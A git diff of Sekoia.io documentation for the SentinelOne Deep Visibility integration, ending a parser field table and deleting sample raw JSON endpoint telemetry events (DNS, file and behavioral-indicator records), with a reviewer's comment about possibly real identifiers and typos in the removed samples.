`long` | | -|`deepvisibility.process.target.counters.registry_modification` | `long` | | -|`deepvisibility.process.target.excluded` | `keyword` | | -|`deepvisibility.process.target.executable` | `keyword` | Absolute path to the process executable. | -|`deepvisibility.process.target.executable.is_dir` | `keyword` | | -|`deepvisibility.process.target.executable.name` | `keyword` | | -|`deepvisibility.process.target.executable.node.key` | `keyword` | | -|`deepvisibility.process.target.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.target.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.target.executable.start` | `keyword` | | -|`deepvisibility.process.target.family` | `keyword` | | -|`deepvisibility.process.target.hash.md5` | `keyword` | MD5 hash. | -|`deepvisibility.process.target.hash.sha1` | `keyword` | SHA1 hash. | -|`deepvisibility.process.target.hash.sha256` | `keyword` | SHA256 hash. 
| -|`deepvisibility.process.target.integrity_level` | `keyword` | | -|`deepvisibility.process.target.interactive` | `keyword` | | -|`deepvisibility.process.target.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.target.is_wow64` | `keyword` | | -|`deepvisibility.process.target.name` | `keyword` | Process name. | -|`deepvisibility.process.target.node.key` | `keyword` | | -|`deepvisibility.process.target.parent.node.key` | `keyword` | | -|`deepvisibility.process.target.pid` | `long` | Process id. | -|`deepvisibility.process.target.root` | `keyword` | | -|`deepvisibility.process.target.session_id` | `long` | | -|`deepvisibility.process.target.start` | `date` | The time the process started. | -|`deepvisibility.process.target.true_context.key` | `keyword` | | -|`deepvisibility.process.target.user.sid` | `keyword` | | -|`deepvisibility.process.target.working_directory` | `keyword` | The working directory of the process. | -|`deepvisibility.process.true_context.key` | `keyword` | | -|`deepvisibility.process.user.sid` | `keyword` | | -|`deepvisibility.registry.export_path` | `keyword` | | -|`deepvisibility.registry.import_path` | `keyword` | | -|`deepvisibility.registry.new.value_type` | `keyword` | | -|`deepvisibility.registry.old.data.bytes` | `keyword` | | -|`deepvisibility.registry.old.data.strings` | `keyword` | | -|`deepvisibility.registry.old.key_name` | `keyword` | | -|`deepvisibility.registry.old.value_type` | `keyword` | | -|`deepvisibility.registry.security_information` | `long` | | -|`deepvisibility.registry.value_type` | `keyword` | | -|`deepvisibility.scheduled_task.name` | `keyword` | Scheduled task name | -|`deepvisibility.scheduled_task.trigger_type` | `long` | Scheduled task trigger type | -|`deepvisibility.script.app_name` | `keyword` | | -|`deepvisibility.true_context.key` | `keyword` | | -|`destination.ip` | `ip` | IP address of the destination. | -|`destination.port` | `long` | Port of the destination. 
| -|`dll.name` | `keyword` | Name of the library. | -|`dll.path` | `keyword` | Full file path of the library. | -|`dns.question.name` | `keyword` | The name being queried. | -|`event.action` | `keyword` | The action captured by the event. | -|`event.start` | `date` | event.start contains the date when the event started or when the activity was first observed. | -|`file.code_signature.exists` | `boolean` | Boolean to capture if a signature is present. | -|`file.code_signature.subject_name` | `keyword` | Subject name of the code signer | -|`file.code_signature.valid` | `boolean` | Boolean to capture if the digital signature is verified against the binary content. | -|`file.created` | `date` | File creation time. | -|`file.extension` | `keyword` | File extension, excluding the leading dot. | -|`file.hash.md5` | `keyword` | MD5 hash. | -|`file.hash.sha1` | `keyword` | SHA1 hash. | -|`file.hash.sha256` | `keyword` | SHA256 hash. | -|`file.name` | `keyword` | Name of the file including the extension, without the directory. | -|`file.owner` | `keyword` | File owner's username. | -|`file.path` | `keyword` | Full path to the file, including the file name. | -|`file.size` | `long` | File size in bytes. | -|`file.type` | `keyword` | File type (file, dir, or symlink). | -|`file.uid` | `keyword` | The user ID (UID) or security identifier (SID) of the file owner. | -|`host.name` | `keyword` | Name of the host. | -|`host.os.family` | `keyword` | OS family (such as redhat, debian, freebsd, windows). | -|`host.os.name` | `keyword` | Operating system name, without the version. | -|`host.type` | `keyword` | Type of host. | -|`http.request.method` | `keyword` | HTTP request method. | -|`network.direction` | `keyword` | Direction of the network traffic. | -|`process.code_signature.exists` | `boolean` | Boolean to capture if a signature is present. 
| -|`process.code_signature.subject_name` | `keyword` | Subject name of the code signer | -|`process.code_signature.valid` | `boolean` | Boolean to capture if the digital signature is verified against the binary content. | -|`process.command_line` | `keyword` | | -|`process.executable` | `keyword` | Absolute path to the process executable. | -|`process.exit_code` | `long` | The exit code of the process. | -|`process.hash.md5` | `keyword` | MD5 hash. | -|`process.hash.sha1` | `keyword` | SHA1 hash. | -|`process.hash.sha256` | `keyword` | SHA256 hash. | -|`process.name` | `keyword` | Process name. | -|`process.parent.command_line` | `wildcard` | Full command line that started the process. | -|`process.parent.executable` | `keyword` | Absolute path to the process executable. | -|`process.parent.hash.md5` | `keyword` | MD5 hash. | -|`process.parent.hash.sha1` | `keyword` | SHA1 hash. | -|`process.parent.hash.sha256` | `keyword` | SHA256 hash. | -|`process.parent.name` | `keyword` | Process name. | -|`process.parent.pid` | `long` | Process id. | -|`process.parent.start` | `date` | The time the process started. | -|`process.parent.title` | `keyword` | Process title. | -|`process.parent.working_directory` | `keyword` | The working directory of the process. | -|`process.pid` | `long` | Process id. | -|`process.start` | `date` | The time the process started. | -|`process.title` | `keyword` | Process title. | -|`process.working_directory` | `keyword` | The working directory of the process. | -|`registry.data.bytes` | `keyword` | Original bytes written with base64 encoding. | -|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | -|`registry.path` | `keyword` | Full path, including hive, key and value | -|`registry.value` | `keyword` | Name of the value written. | -|`source.address` | `keyword` | Source network address. | -|`source.ip` | `ip` | IP address of the source. | -|`source.port` | `long` | Port of the source. 
| -|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | -|`user.id` | `keyword` | Unique identifier of the user. | -|`user.name` | `keyword` | Short name or login of the user. | - - - -For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/SentinelOne/deep_visibility). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md b/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md deleted file mode 100644 index feda8b8af3..0000000000 --- a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md +++ /dev/null 
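Review bot: The transformed-event samples removed in this region carry what look like real rather than anonymised identifiers (the user login and domain `CORP\l.maoui`, full Windows SIDs, the private address `10.26.8.27`, an Outlook cache path under a named user profile, and the tenant URL `https://euce1-110-nfr.sentinelone.net`); if these samples are being relocated rather than dropped, replace them with synthetic values before they are republished. Two wording issues in the removed text are worth carrying over as well: "It should be noted that infered fields are not listed" should read "inferred", and `deepvisibility.agent.managment_url` appears with that spelling both in the field table and in the transformed JSON, so the misspelling originates in the parser output and a documentation-only fix would not address it.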
@@ -1,2982 +0,0 @@ - -### Raw Events Samples - -In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. - - -=== "behavioral_indicators" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFQB788MA7GG70KGC1DSQ6ZT", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631797347671" - }, - "event_type": "behavioralIndicators", - "source": { - "node": { - "key": { - "value": "7DC20CD7D1BEDF9F" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8", - "fullPid": { - "pid": 19720, - "startTime": { - "millisecondsSinceEpoch": "1631797347668" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": 
"S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 26188, - "startTime": { - "millisecondsSinceEpoch": "1631516876708" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "41CA3A862279A7BC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "modelChildProcess": 1804, - "osChildProcess": 1804, - "crossProcess": 590449, - "moduleLoad": 2112, - "fileCreation": 490788, - "fileDeletion": 466017, - "fileModification": 1403458, - "exeModification": 1, - "netConnOut": 12, - "registryModification": 1847, - "crossProcessDupThreadHandle": 5290, - "crossProcessDupProcessHandle": 585159, - "dnsLookups": 16 - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": 
"LOW", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "moduleLoad": 70, - "registryModification": 1 - } - }, - "indicator": "WD109", - "metadata": "To Process[ Name: \"chrome.exe\", Pid: \"19720\", UID: \"7DC20CD7D1BEDF9F\", TrueContextID: \"6B188EE5E8C5F24F\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "category": "BI_EVASION", - "classification": "PUA", - "description": "Code injection to other process memory space during the target process' initialization", - "friendlyName": "PreloadInjection", - "tactics": [ - { - "name": "Defense Evasion", - "source": "MITRE", - "techniques": [ - { - "name": "T1055.012", - "link": "https://attack.mitre.org/techniques/T1055/012/" - } - ] - }, - { - "name": "Privilege Escalation", - "source": "MITRE", - "techniques": [ - { - "name": "T1055.012", - "link": "https://attack.mitre.org/techniques/T1055/012/" - } - ] - } - ], - "longDescription": "Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}" - } - ``` - - - -=== "event_dns" - - - ```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba8797a22e3c20762", - "traceId": "BA1BE2835D6E4FF7B023C72DCE8B3829", - "agentVersion": "S1-WIN/4.6.14.304", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1628516010404" - }, - "trueContext": { - "key": { - "value": "C20F3967ACBB2FE7" - } - }, - "source": { - "node": { - "key": { - "value": "87E0B0E05D9D6CC8" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": 
"1628149542879" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8", - "fullPid": { - "pid": 13796, - "startTime": { - "millisecondsSinceEpoch": "1628515734223" - } - }, - "user": { - "name": "CLIENT\\t.Naohisa", - "sid": "S-1-5-21-1525252525-7987987987-1111111111-6174" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "C20F3967ACBB2FE7" - } - }, - "counters": { - "moduleLoad": 90, - "fileCreation": 45, - "fileDeletion": 19, - "fileModification": 101, - "netConnOut": 31, - "dnsLookups": 35 - } - }, - "query": "lh5.googleusercontent.com", - "results": "type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;", - "event_type": "dns" - } - ``` - - - -=== "file_creation" - - - ```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba871111111111111", - "traceId": "BABABABABEEE43452345234523423423", - "agentVersion": "S1-WIN/2.2.11.333", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "88888", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": 
"7474746212121" - }, - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "source": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628149542456" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 14896, - "startTime": { - "millisecondsSinceEpoch": "1628515733321" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "03267F6915111A61" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "crossProcess": 1610, - "moduleLoad": 245, - "fileCreation": 148, - "fileDeletion": 58, - "fileModification": 416, - "registryModification": 32, - "crossProcessDupThreadHandle": 20, - "crossProcessDupProcessHandle": 1590 - } - }, - "targetFile": { - "node": { - "key": { - "value": "737373ABCDEF7373" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628515733666" - }, - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data", - "owner": {}, - "isDir": "test_not_E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_creation2" - - - 
```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba871111111111111", - "traceId": "BABABABABEEE43452345234523423423", - "agentVersion": "S1-WIN/2.2.11.333", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "88888", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "7474746212121" - }, - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "source": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628149542654" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 14896, - "startTime": { - "millisecondsSinceEpoch": "1628515733932" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "03267F6915111A61" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "crossProcess": 1610, - "moduleLoad": 245, - "fileCreation": 148, - "fileDeletion": 58, - "fileModification": 416, - "registryModification": 32, - "crossProcessDupThreadHandle": 20, - 
"crossProcessDupProcessHandle": 1590 - } - }, - "targetFile": { - "node": { - "key": { - "value": "737373ABCDEF7373" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "7474746212121" - }, - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data\\98798798-bbb2-9898-aaaa-1212121212f.tmp", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_creation3" - - - ```json - { - "meta": { - "uuid": "123", - "traceId": "123", - "agentVersion": "S1-WIN/21.7.7.40005", - "osFamily": "windows", - "osName": "Windows Server 2019 Standard", - "osRevision": "17763", - "computerName": "123", - "machineType": "server", - "mgmtUrl": "https://foo.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1660727585201" - }, - "event_type": "fileCreation", - "trueContext": { - "key": { - "value": "CB18415B7D5C7DC1" - } - }, - "source": { - "node": { - "key": { - "value": "D65452060133453B" - } - }, - "executable": { - "node": { - "key": { - "value": "3EFA3EFA3EFA3EFA" - } - }, - "creationTime": {}, - "owner": {}, - "hashes": {} - }, - "fullPid": { - "pid": 22545, - "startTime": { - "millisecondsSinceEpoch": "1660727582129" - } - }, - "user": {}, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": {} - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Unknown file", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 4294967295, - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CB18415B7D5C7DC1" - } - }, - "counters": { - "fileCreation": 3, - "fileModification": 6 - } - }, - "targetFile": { - "node": { - "key": { - "value": "39AD9E819F6BE850" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1660727585201" - }, - "path": "Anonymized Data", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - } - } - ``` - - - -=== 
"file_creation_missing_fields" - - - ```json - { - "timestamp": { - "millisecondsSinceEpoch": "1629899209700" - }, - "meta": { - "seqId": 45, - "uuid": "6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab", - "traceId": "E1A04C7727EB41E5A3D0FF068D4BE544", - "agentVersion": "S1-WIN/4.4.3.149", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-COM4", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "trueContext": { - "key": { - "value": "0506A768B8828E35" - } - }, - "source": { - "node": { - "key": { - "value": "2FFCA561EE506063" - } - }, - "executable": { - "node": { - "key": { - "value": "E4CD922E494CA3C5" - } - }, - "creationTime": {}, - "path": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "4253328", - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018", - "fullPid": { - "pid": 6104, - "startTime": { - "millisecondsSinceEpoch": "1629878298032" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "D3250A9CB211CC1E" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "FortiClient Network Access Control", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "0506A768B8828E35" - } - }, - "counters": { - "moduleLoad": 1948, - "fileCreation": 647, - "fileDeletion": 647, - "fileModification": 2141, - "exeModification": 40, - "netConnOut": 203, - "registryModification": 654, - "dnsLookups": 30 - } - }, - "targetFile": { - "node": { - "key": { - "value": "4685AD1C6BC7D31D" - } - }, - "creationTime": {}, - "path": "C:\\Program 
Files\\Fortinet\\FortiClient\\large_data_upload\\0.bin", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_deletion" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFJG3VW54HS5577EY3CY83M8", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634706079" - }, - "event_type": "fileDeletion", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "source": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 26188, - "startTime": { - "millisecondsSinceEpoch": "1631516876708" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "41CA3A862279A7BC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": 
"E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "modelChildProcess": 761, - "osChildProcess": 761, - "crossProcess": 332191, - "moduleLoad": 1177, - "fileCreation": 295369, - "fileDeletion": 282078, - "fileModification": 849997, - "netConnOut": 5, - "registryModification": 788, - "crossProcessDupThreadHandle": 2431, - "crossProcessDupProcessHandle": 329760, - "dnsLookups": 5 - } - }, - "targetFile": { - "node": { - "key": { - "value": "780E03EC9E64BBE3" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631634705524" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\650d1e12-cd20-438f-8c15-b58c713de9c7\\todelete_429a860c9774094b_0_1.exe", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - } - } - ``` - - - -=== "file_deletion_linux" - - - ```json - { - "meta": { - "uuid": "185f2b1e-bdca-c6e2-91b0-520df717d799", - "traceId": "01GBM84F2S5AZQSP200MBDS22Q", - "agentVersion": "S1-LIN/22.2.2.2", - "osFamily": "linux", - "osName": "Linux", - "osRevision": "Amazon 2 4.14.246-187.474.amzn2.x86_64", - "computerName": "ip-1-1-1-1.eu-west-1.compute.internal", - "machineType": "server", - "mgmtUrl": "https://euce1-103.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1661758224333" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "source": { - "node": { - "key": { - "value": "0f4ca868-3233-c901-c895-a9716d0c7a59" - } - }, - "executable": { - "node": { - "key": { - "value": "0f4ca59e-5ecc-2161-c4e7-97ac79e4c629" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630345715000" - }, - "path": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "pUnix": "0", - 
"owner": {}, - "sizeBytes": "48935408", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": { - "sha1": "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - }, - "fileLocation": "Local" - }, - "commandLine": " node /usr/local/bin/npm install", - "fullPid": { - "pid": 12322, - "startTime": { - "millisecondsSinceEpoch": "1661758222250" - } - }, - "user": { - "name": "root", - "sid": "3397" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0f4ca51a-f789-1621-a626-2b1b1c4a93f0" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "node", - "root": "E_FALSE", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "counters": { - "fileCreation": 537, - "fileDeletion": 272, - "fileModification": 545, - "netConnOut": 10 - } - }, - "file": { - "node": { - "key": { - "value": "0f4d14d9-ce0f-85db-b8b9-0b942faf064b" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1661758119966" - }, - "path": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "pUnix": "0", - "owner": {}, - "sizeBytes": "1347", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "sizeBytes": "1347", - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": { - "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709" - } - } - ``` - - - -=== "file_deletion_osx" - - - ```json - { - "meta": { - "uuid": "81A8A777-22BD-5CF8-9BF1-FD05875D9CD5", - "traceId": "D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1", - "agentVersion": "S1-MAC/22.2.3.6268", - "osFamily": "osx", - "osName": "OS X", - "osRevision": "12.5.1 (21G83)", - "computerName": "MAC12345678", - "machineType": "laptop", - "mgmtUrl": 
